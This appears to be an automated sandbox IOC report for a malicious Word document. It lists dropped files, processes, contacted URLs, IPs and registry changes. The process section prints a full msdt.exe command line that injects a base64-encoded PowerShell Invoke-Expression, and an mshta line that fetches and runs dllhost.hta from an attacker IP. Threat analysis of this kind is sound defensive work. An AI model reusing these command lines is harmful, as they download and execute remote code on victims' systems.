IOC Report
V3g2Pfu707.docx

loading gif

Files

File Path
Type
Category
Malicious
V3g2Pfu707.docx
Microsoft OOXML
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\V3g2Pfu707.docx.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:42 2022, mtime=Thu Jun 16 20:20:13 2022, atime=Thu Jun 16 20:19:54 2022, length=520148, window=hide
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A30EFB.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B087DC1.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CF27FA06.jpeg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 581x1278, frames 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E2151DD9.jpeg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1268x951, frames 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9C7F191B-1B19-4530-878D-79768D2CF994}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{EBAAA875-CA9E-482D-9FF8-D03B7C8CE152}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta
HTML document, ASCII text
downloaded
C:\Users\user\AppData\Local\Temp\RES55EE.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES5BB.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES5C8A.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\msoD879.tmp
GIF image data, version 89a, 15 x 15
dropped
C:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$g2Pfu707.docx
data
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{95873921-7BBD-4EBD-8008-620874EEAE52}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{55CA3E23-CD6A-4540-AFBA-3E4A75CEA258}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83357E0C.jpeg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 581x1278, frames 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F1DC677.jpeg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1268x951, frames 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6245E340-9A7D-4D8C-95F3-E607A94CA060}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6A4592DE-D21D-4642-AE77-FFCC3AAD3185}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F19FE166-8B13-4DD0-BB8B-900FB9050402}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\mso563B.tmp
GIF image data, version 89a, 15 x 15
dropped
C:\Users\user\AppData\Local\Temp\{918117C9-F5EE-4EA7-AC8B-621A6E7B7534}
data
dropped
C:\Users\user\AppData\Local\Temp\{C46AD554-98E1-4325-9E00-58DC273C73AD}
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\V3g2Pfu707.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:51 2022, mtime=Tue Mar 8 15:45:51 2022, atime=Thu Jun 16 20:14:10 2022, length=520148, window=hide
dropped
There are 43 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\\SysWOW64\\rundll32.exe
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://106.55.17.200/jquery-3.3.1.slim.min.js
malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
http://159.75.135.162:61256/dllhost.htaV
unknown
https://store.office.cn/addinstemplate
unknown
http://159.75.135.162:61256/dllhost.htaY
unknown
https://api.aadrm.com
unknown
https://106.55.17.200:62002/
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
http://159.75.135.162:61256/dllhost.htag
unknown
https://dataservice.o365filtering.com/
unknown
http://159.75.135.162:61256/dllhost.htaET4.C:
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://106.55.17.200/
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
https://106.55.17.200:62002/jquery-3.3.1.slim.min.js
unknown
https://management.azure.com/
unknown
https://messaging.lifecycle.office.com/getcustommessage16
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
101.33.231.81
unknown
China
malicious
159.75.135.162
unknown
China
192.168.2.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
t:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
t:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
zx:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
'~:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://101.33.231.81:62563/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://101.33.231.81:62563
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\211BA
211BA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiLight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiBold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Light SemiCondensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiLight SemiConde
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiCondensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiBold SemiConden
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Light Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiLight Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiBold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gadugi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ink Free
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Javanese Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Myanmar Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nirmala UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nirmala UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe MDL2 Assets
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Emoji
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Historic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Small
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Subheading
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Heading
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Display
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Banner
